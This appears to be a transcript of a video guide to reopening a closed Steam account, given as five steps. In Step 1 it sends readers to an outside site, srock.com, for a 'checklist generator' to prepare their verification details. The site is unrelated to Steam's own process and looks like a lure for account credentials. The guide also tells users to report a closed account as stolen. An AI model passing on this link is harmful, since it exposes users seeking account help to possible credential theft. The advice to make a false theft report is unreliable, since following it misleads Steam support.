If you have closed your Steam account and wish to reopen it, follow these steps to guide you through the process. Make sure you have access to the email associated with your account. Step 1. Visit the Steam support website. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Sign in or select account sign in. If you remember your login details, try signing in. If you cannot remember your credentials or your account is closed, click on the account sign in option to proceed with account recovery. Step 3. Select my account was stolen. Once you are on the account recovery page, select the option that states my account was stolen or a similar option. This will guide you through the steps to recover a closed account. Step 4. Verify your identity. You will be prompted to verify your identity. This may involve answering security questions, providing proof of ownership, or confirming your email address. Follow the instructions carefully to complete this step. Step 5. Wait for confirmation. After submitting your request, wait for a confirmation email from Steam. This may take some time, so be patient. Once your account is reinstated, you will receive instructions on how to access it again. Once you have completed these steps, you should be able to access your Steam account again. If you encounter any issues, consider reaching out to Steam support for further assistance.